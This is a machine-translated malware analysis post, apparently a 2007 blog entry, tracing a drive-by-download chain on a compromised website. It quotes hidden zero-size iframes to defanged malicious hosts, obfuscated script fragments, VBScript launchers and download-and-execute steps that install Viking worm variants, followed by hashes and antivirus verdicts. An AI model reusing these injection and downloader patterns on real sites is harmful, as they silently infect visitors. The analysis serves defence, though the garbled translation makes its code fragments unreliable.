A website that will download at least three Viking and other malicious programs

EndurerOriginal
1Version

Some netizens said that, shortly after his computer opened a website, real-time monitoring of anti-virus software was disabled, the system time was modified, and various online games and chat account Trojan horses were installed.

Check the homepage code of the website and find:
/---
If (parent. Window. opener) parent. Window. opener. Location = 'hxxp: // AA *** A. sqr *** S11 *** 0.com /';
...... (Omitted )......
<SCRIPT src = "hxxp: // M *** A. China *** s ** es ** e.net/top.js"> </SCRIPT>
---/

Hxxp: // sqr *** S1 ***. s *** E * 771.com/Code included:
/---
<IFRAME src = "hxxp: // M ***. china ** S * es ** e.net/110.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

110. htmCode included:
/---
<IFRAME src = "hxxp: // WG ***. 72 *** 9 * 72.com/index.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Index.htmCode included:
/---
<IFRAME src = "hxxp: // Union **. 0 *** kis.com/in.htm? 7141 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

In.htm? 7141Code included:
/---
<SCRIPT src = CSS. js> </SCRIPT>
<HTML>
<Title>
Test
</Title>
<Body>
<IFRAME src1_test.htm width = 0 Height = 0> </iframe>
Test
</Body>
</Html>
---/

CSS. jsThe content is to use eval () to execute the custom function. After two decryption, JavaScript code is obtained, and Microsoft is used. XMLHTTP and SCR accept pting. fileSystemObject downloads the file love.exe and saves it to % WINDIR %. The file name is defined by the function:
/---
Function Gn (n) {var number = math. Random () * n; return math.round(numberw.w.'.exe ';}
---/
Generate, that is ***. EXE (where * is a number), and then use shell. execute the command in the ShellExecute method of application object Q: % WINDIR %/system32/cmd.exe/C % WINDIR % /***..

Test.htmCode included:
/---
<Head>
<Title> test </title>
<SCRIPT src = "test. js"> </SCRIPT>
</Head>
<SCRIPT>
Exec ();
</SCRIPT>
</Body>
---/

Test. jsThe content is not encrypted. Use activexobject ("thunderserver. webthunder.1") to download love.exe, save it to C:/, and run it with a timer.

File Description: D:/test/love.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 21:41:28
Modification time: 21:41:30
Access time:
Size: 95232 bytes, 93.0 KB
MD5: 0b75d7947a9ac806318170a2cd45188a

Kaspersky reportsWorm. win32.viking. lmThe rising report isWorm. Viking. TC

Scanned file: love.exe-infected

Love.exe-infected by worm. win32.viking. lm Statistics: Known viruses: 340918 Updated: 06-06-2007 File size (Kb ): 93 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0

Hxxp: // M *** A. China *** s ** es ** e.net/top.jsThe code is rare:
/---
Window ["/x64/x6f/x63/x75/x6d/X65/x6e/x74"] ["/x77/x72/x69/x74/X65"] ("/x3c...... (Omitted )...... /X3e ");
...... (Omitted )......
Window ["/x64 ...... (Omitted )...... /X74 "] ["/x77/x72/x69/x74/X65/x6c/x6e "] ("/x3c // cross/x3e ");
...... (Omitted )......
---/
HTML code for decryption:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // M ***. china ** S * es ** e.net/1100.htm'> </iframe> <IFRAME width = '0' Height = '0' src = 'hxxp: // 9.72972.com/index.html'> </iframe> <IFRAME width = '0' Height = '0' src = 'hxxp: // WG ***. 72 *** 9 * 72.com/ '> </iframe> <p align = "center">
<IFRAME frameborder = no border = 0 marginwidth = 0 marginheight = 0 scrolling = no width = 760 Height = 80 src = hxxp: // M ***. china ** S * es ** e.net/110.htm target = "_ blank" name = "I1"> </iframe>
</P>
---/

1100. htmThe content is VBScript code. The function is to use a custom function:
/---
Function rechange (k)
S = Split (K, CHR (-24081 ))
T = ""
For I = 0 to ubound (s)
Kellav = eval (S (I ))
T = T + CHR (kellav)
Next
Rechange = T
End Function
---/
Decryption variable: t = "68★105★109 ...... (Omitted )......★13★10 ", and then execute with execute.

The decrypted tvalue is the VBScript code. The function is to use Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the 123.exefile and saves it in the temporary ie folder. The file name is hbstwgp.com and the pdoqmyn file is created. vbs, content:
/---
Set shell = Createobject ("wscript. Shell ")
Shell. Run ("in the temporary ie folder, the file name is hbstwgp.com ")
Set shell = nothing
---/
Run pdoqmyn. vbs through the ShellExecute method of the shell. Application Object run to run hbstwgp.com.

File Description: D:/test/123.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 22:25:23
Modification time: 22:25:24
Access time:
Size: 25291 bytes, 24.715 KB
MD5: 56c51cac7f6301be1b3c395d7bd226b8

Kaspersky reportsVirus. win32.autorun. f

Scanned file: 123.exe-infected

123. exe-infected by virus. win32.autorun. f Statistics: Known viruses: 340941 Updated: 06-06-2007 File size (Kb ): 25 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0

Hxxp: // 9.72972.com/index.htmlCode included:
/---
<IFRAME src = "hxxp: // www. p * u ** M * A1 ** 64.com/p0000u00000000/8549647.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // s *** W *** K * ee.com/aacc.htm? 23 "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // www. p * u ** M * A1 ** 64.com/p?u=#/8549647.htmCode included:
/---
<Script language = "jscript. encode" src = 164.js> </SCRIPT>
---/

Hxxp: // www. p * u ** M * A1 ** 64.com/p?u=#/164.js
The content is to use eval () to execute the custom function. After three decryption, JavaScript code is obtained, and Microsoft is used. XMLHTTP and SCR accept pting. fileSystemObject downloads the file 1.exeand saves it to % WINDIR %. The file name is defined by the function:
/---
Function Gn (n) {var number = math. Random () * n; return math.round(numberw.w.'.exe ';}
---/
Generate, that is ***. EXE (where * is a number), and then use shell. execute the command in the ShellExecute method of application object Q: % WINDIR %/system32/cmd.exe/C % WINDIR % /***..

File Description: D:/test/1.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:30:27
Modification time: 22:30:28
Access time:
Size: 95232 bytes, 93.0 KB
MD5: f13950bd6b6c31e10a8c66c5c3141aeb

Kaspersky reportsWorm. win32.viking. lrThe rising report isWorm. Viking. Te

Scanned file: 1.exe-infected

1. exe-infected by worm. win32.viking. lr Statistics: Known viruses: 340941 Updated: 06-06-2007 File size (Kb ): 93 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0

Hxxp: // s *** W *** K *** ee.com/aacc.htm? 23Code included:
/---
<SCRIPT src = windows. js> </SCRIPT>
---/

Windows. jsThe content is to use eval () to execute a custom function. After decryption, JavaScript code is obtained and Microsoft is used. XMLHTTP and SCR accept pting. fileSystemObject downloads the xz.exe file and saves it to % WINDIR %. The file name is defined by the function:
/---
Function KS (VPN) {var num = math. Random () * VPN; return '~ Temp '+ math. Round (Num) +'. tmp '}
---/
Generate, that is ~ Temp ***.. TMP (where * is a number), and then through shell. execute the command in the ShellExecute method of application object Q: % WINDIR %/system32/cmd.exe/C % WINDIR % /***..

File Description: D:/test/xz.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:39:49
Modification time: 22:39:50
Access time:
Size: 105472 bytes 103.0 KBA
MD5: 692bdc6c4e92c7cc44fd623eaa8e1ddc

Kaspersky reportsWorm. win32.viking. BDThe rising report isWorm. Viking. El

Scanned file: xz.exe-infected

Xz.exe-infected by worm. win32.viking. BD Statistics: Known viruses: 340941 Updated: 06-06-2007 File size (Kb ): 103 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0